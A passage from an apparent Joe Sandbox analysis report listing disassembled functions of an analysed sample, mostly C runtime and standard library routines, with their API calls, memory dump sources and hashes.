                                                                                                                                                                    • Opcode Fuzzy Hash: bac457c1d0357e43d4fd7ae8762c2000ad9b1ee127a26699745eeb32f5bafc45
                                                                                                                                                                    • Instruction Fuzzy Hash: EC01FC3210E712DEAF2627747CC5A6F3645EB027757240329F110D52E5EF514D0597B1
                                                                                                                                                                    Function 00D9DB88 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 00D9DCA7
                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 00D9DF20
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                    • API String ID: 2673424686-393685449
                                                                                                                                                                    • Opcode ID: 4b58dc205da27564a77d08291fec016d976937d135400b06f74ae3c4050395a1
                                                                                                                                                                    • Instruction ID: 542dc2b2f14e83631d802ee2e10cbf9d06177afe852f3b70b893bc5096a1e876
                                                                                                                                                                    • Opcode Fuzzy Hash: 4b58dc205da27564a77d08291fec016d976937d135400b06f74ae3c4050395a1
                                                                                                                                                                    • Instruction Fuzzy Hash: 53B19C71800209EFCF25EFA4D9819AEBBB6FF18310F18415AF8116B206D775EA51CBB1
                                                                                                                                                                    Function 00D98C55 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00DAB774,000000FF,?,00D98D16,00D98BFD,?,00D98DB2,00000000), ref: 00D98C8A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D98C9C
                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,00DAB774,000000FF,?,00D98D16,00D98BFD,?,00D98DB2,00000000), ref: 00D98CBE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                    • API String ID: 4061214504-1276376045
                                                                                                                                                                    • Opcode ID: 7efbb5db28a844a7b10248094a0365a1f19e8520dad58414b8dc48bf2822ecce
                                                                                                                                                                    • Instruction ID: df86e29faa85f9ca73dfc34fc5d41ebbcbbcdd9a9812470cf00676be981bcef5
                                                                                                                                                                    • Opcode Fuzzy Hash: 7efbb5db28a844a7b10248094a0365a1f19e8520dad58414b8dc48bf2822ecce
                                                                                                                                                                    • Instruction Fuzzy Hash: B3018F32A41715EFCF118B54CC09BAEBBB8FB45B10F040625E812E22D0DBB49900DAB0
                                                                                                                                                                    Function 00D9FC3D Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D9FCC2
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00D9FD8B
                                                                                                                                                                    • __freea.LIBCMT ref: 00D9FDF2
                                                                                                                                                                      • Part of subcall function 00D9E531: HeapAlloc.KERNEL32(00000000,00D931E1,00D9186A,?,00D960C1,00D9186C,00D9186A,?,?,?,00D93181,00D931E1,00D9186E,00D9186A,00D9186A,00D9186A), ref: 00D9E563
                                                                                                                                                                    • __freea.LIBCMT ref: 00D9FE05
                                                                                                                                                                    • __freea.LIBCMT ref: 00D9FE12
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1096550386-0
                                                                                                                                                                    • Opcode ID: 691a32cc6d68db1ebe3daccf38835fd23b726be475b767a1a615624cdecc42cd
                                                                                                                                                                    • Instruction ID: 48b74b58ffaf5e7b786c6ca65898b5682caf9c0b4e79585720a87ef705a37c50
                                                                                                                                                                    • Opcode Fuzzy Hash: 691a32cc6d68db1ebe3daccf38835fd23b726be475b767a1a615624cdecc42cd
                                                                                                                                                                    • Instruction Fuzzy Hash: 8A51B272604206AFEF219F619C81EBB7BA9EF44710B2D4538FD04D7122EB31CC6086B0
                                                                                                                                                                    Function 00D93010 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00D93017
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00D93022
                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00D93090
                                                                                                                                                                      • Part of subcall function 00D92EE4: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00D92EFC
                                                                                                                                                                    • std::locale::_Setgloballocale.LIBCPMT ref: 00D9303D
                                                                                                                                                                    • _Yarn.LIBCPMT ref: 00D93053
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1088826258-0
                                                                                                                                                                    • Opcode ID: eb676b36f89be2a2c8bcbf548a9f869d8596a0f2bbb1981ab67d3e387bf90231
                                                                                                                                                                    • Instruction ID: 2f9445e315849c6cb2bc111873a6527773f4c7f0aae9f942a2ca3534fdb763a2
                                                                                                                                                                    • Opcode Fuzzy Hash: eb676b36f89be2a2c8bcbf548a9f869d8596a0f2bbb1981ab67d3e387bf90231
                                                                                                                                                                    • Instruction Fuzzy Hash: B3017CB5A00610EBCF16EF60E88557D7BA1FF84350B184109E81297391CF35AE02DBB1
                                                                                                                                                                    Function 00DA7E92 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00DA7F2E,00000000,?,00DB6E10,?,?,?,00DA7E65,00000004,InitializeCriticalSectionEx,00DAE57C,00DAE584), ref: 00DA7E9F
                                                                                                                                                                    • GetLastError.KERNEL32(?,00DA7F2E,00000000,?,00DB6E10,?,?,?,00DA7E65,00000004,InitializeCriticalSectionEx,00DAE57C,00DAE584,00000000,?,00D9E1DC), ref: 00DA7EA9
                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00DA7ED1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                    • String ID: api-ms-
                                                                                                                                                                    • API String ID: 3177248105-2084034818
                                                                                                                                                                    • Opcode ID: 966093eace4cdd8869cff75a437db8690054ff22cadb6d225d68992fbc8b5f7f
                                                                                                                                                                    • Instruction ID: 850020eba7f51e621acb16e0acec77135bece02755caa52623db343672d285a1
                                                                                                                                                                    • Opcode Fuzzy Hash: 966093eace4cdd8869cff75a437db8690054ff22cadb6d225d68992fbc8b5f7f
                                                                                                                                                                    • Instruction Fuzzy Hash: B4E04831284309FBEF101B60DC06B597B59DB11B51F144060F90DF85E1E771EE50A6F4
                                                                                                                                                                    Function 00DA562D Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00DA5690
                                                                                                                                                                      • Part of subcall function 00D9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D9FDE8,?,00000000,-00000008), ref: 00D9E6A2
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00DA58E2
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00DA5928
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00DA59CB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2112829910-0
                                                                                                                                                                    • Opcode ID: bde30fbed5e78d264721e93a29945bb6a53acffd53f0d205d062eb5f87aee5e9
                                                                                                                                                                    • Instruction ID: d188adcfe42935ad8d4aca2f7017e83aee400365b1d655d389b3dde31a7aa15b
                                                                                                                                                                    • Opcode Fuzzy Hash: bde30fbed5e78d264721e93a29945bb6a53acffd53f0d205d062eb5f87aee5e9
                                                                                                                                                                    • Instruction Fuzzy Hash: 22D15975D04648DFCF15CFA8E8809AEBBB9FF0A310F28456AE456EB355D630A941CF60
                                                                                                                                                                    Function 00D9D8AF Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                    • Opcode ID: 74fcd919893de4488af59598964df1654c761b519eb2dc63cc83a711d707a320
                                                                                                                                                                    • Instruction ID: 7b743afd5cef2b6a333a84733aff3be990cc54cbea73287647ea48e1b73a2d04
                                                                                                                                                                    • Opcode Fuzzy Hash: 74fcd919893de4488af59598964df1654c761b519eb2dc63cc83a711d707a320
                                                                                                                                                                    • Instruction Fuzzy Hash: 7851EE76605602BFDF29AF50D845BBAB7B6EF15310F28412DE8469B291E731ED40CBB0
                                                                                                                                                                    Function 00DA3537 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00D9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D9FDE8,?,00000000,-00000008), ref: 00D9E6A2
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00DA359B
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00DA35A2
                                                                                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00DA35DC
                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 00DA35E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1913693674-0
                                                                                                                                                                    • Opcode ID: 29a3e421c98e93e87d895a0e3a79c4aa7f74031ecd25c8bb4aa91b34994d1488
                                                                                                                                                                    • Instruction ID: fbd97174dac727df6435932dabf7a4a67879270219471b5857f1e44c0d0c0e5d
                                                                                                                                                                    • Opcode Fuzzy Hash: 29a3e421c98e93e87d895a0e3a79c4aa7f74031ecd25c8bb4aa91b34994d1488
                                                                                                                                                                    • Instruction Fuzzy Hash: D721D771A05705AFDF20AF6D984182ABBAAFF423647044519F86587601EB30EF009BB1
                                                                                                                                                                    Function 00D98042 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 92b1b0013eeba220840f9d29028ff0f7df398490723d5963fe2aa363fdc1752b
                                                                                                                                                                    • Instruction ID: 88b60f8432ceabacaa32422f5f8f96e36455df98095e4e255eb2d7a36f8826ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 92b1b0013eeba220840f9d29028ff0f7df398490723d5963fe2aa363fdc1752b
                                                                                                                                                                    • Instruction Fuzzy Hash: 2421A232204705AFDF20AF65CC8196B77A9FF427647144529F869D7251EF31EC40A7B1
                                                                                                                                                                    Function 00DA484F Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00DA4857
                                                                                                                                                                      • Part of subcall function 00D9E641: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00D9FDE8,?,00000000,-00000008), ref: 00D9E6A2
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DA488F
                                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DA48AF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 158306478-0
                                                                                                                                                                    • Opcode ID: 74f3ca21055217d0114d89255b3bd33d780efd5debee221c65d427573be95d6a
                                                                                                                                                                    • Instruction ID: 08ac7e8ec3773e2c6ee5f6d89f2152b3acb13907e51e46af6727a18f8872dd31
                                                                                                                                                                    • Opcode Fuzzy Hash: 74f3ca21055217d0114d89255b3bd33d780efd5debee221c65d427573be95d6a
                                                                                                                                                                    • Instruction Fuzzy Hash: 951126F6506265BFAF1567B5AC8EC7F7E5CDEC63943140924F401D1201FAA8DE1096B0
                                                                                                                                                                    Function 00D9457B Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00D94582
                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00D9458C
                                                                                                                                                                      • Part of subcall function 00D924C2: std::_Lockit::_Lockit.LIBCPMT ref: 00D924DE
                                                                                                                                                                      • Part of subcall function 00D924C2: std::_Lockit::~_Lockit.LIBCPMT ref: 00D924F7
                                                                                                                                                                    • codecvt.LIBCPMT ref: 00D945C6
                                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00D945FD
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3716348337-0
                                                                                                                                                                    • Opcode ID: 0a1a8ffdeaa6a8d32354e845e554e5c9e6ea8f597429c1ede87ad10694a93fe2
                                                                                                                                                                    • Instruction ID: e9a201987d440737410b2034793656abf6aff9bf68c36d3bd053b0c6720eef60
                                                                                                                                                                    • Opcode Fuzzy Hash: 0a1a8ffdeaa6a8d32354e845e554e5c9e6ea8f597429c1ede87ad10694a93fe2
                                                                                                                                                                    • Instruction Fuzzy Hash: AC01C076900215EBCF05EBA4D816ABD7771FF54310F250649E411AB392CF74DE0287B1
                                                                                                                                                                    Function 00DAA4E0 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000), ref: 00DAA4F7
                                                                                                                                                                    • GetLastError.KERNEL32(?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000,?,?,?,00DA5365,00000000), ref: 00DAA503
                                                                                                                                                                      • Part of subcall function 00DAA554: CloseHandle.KERNEL32(FFFFFFFE,00DAA513,?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000,?,?), ref: 00DAA564
                                                                                                                                                                    • ___initconout.LIBCMT ref: 00DAA513
                                                                                                                                                                      • Part of subcall function 00DAA535: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00DAA4D1,00DA9AFC,?,?,00DA5A1F,?,00000000,00000000,?), ref: 00DAA548
                                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00DA9B0F,00000000,00000001,00000000,?,?,00DA5A1F,?,00000000,00000000,?), ref: 00DAA528
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 0000000A.00000002.3381795229.0000000000D91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                                                                    • Associated: 0000000A.00000002.3381727415.0000000000D90000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381895759.0000000000DAC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3381970781.0000000000DB5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382204412.0000000000DB8000.00000020.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382274530.0000000000DBA000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    • Associated: 0000000A.00000002.3382356213.0000000000DBD000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_10_2_d90000_5639a58f3b.jbxd
                                                                                                                                                                    Similarity
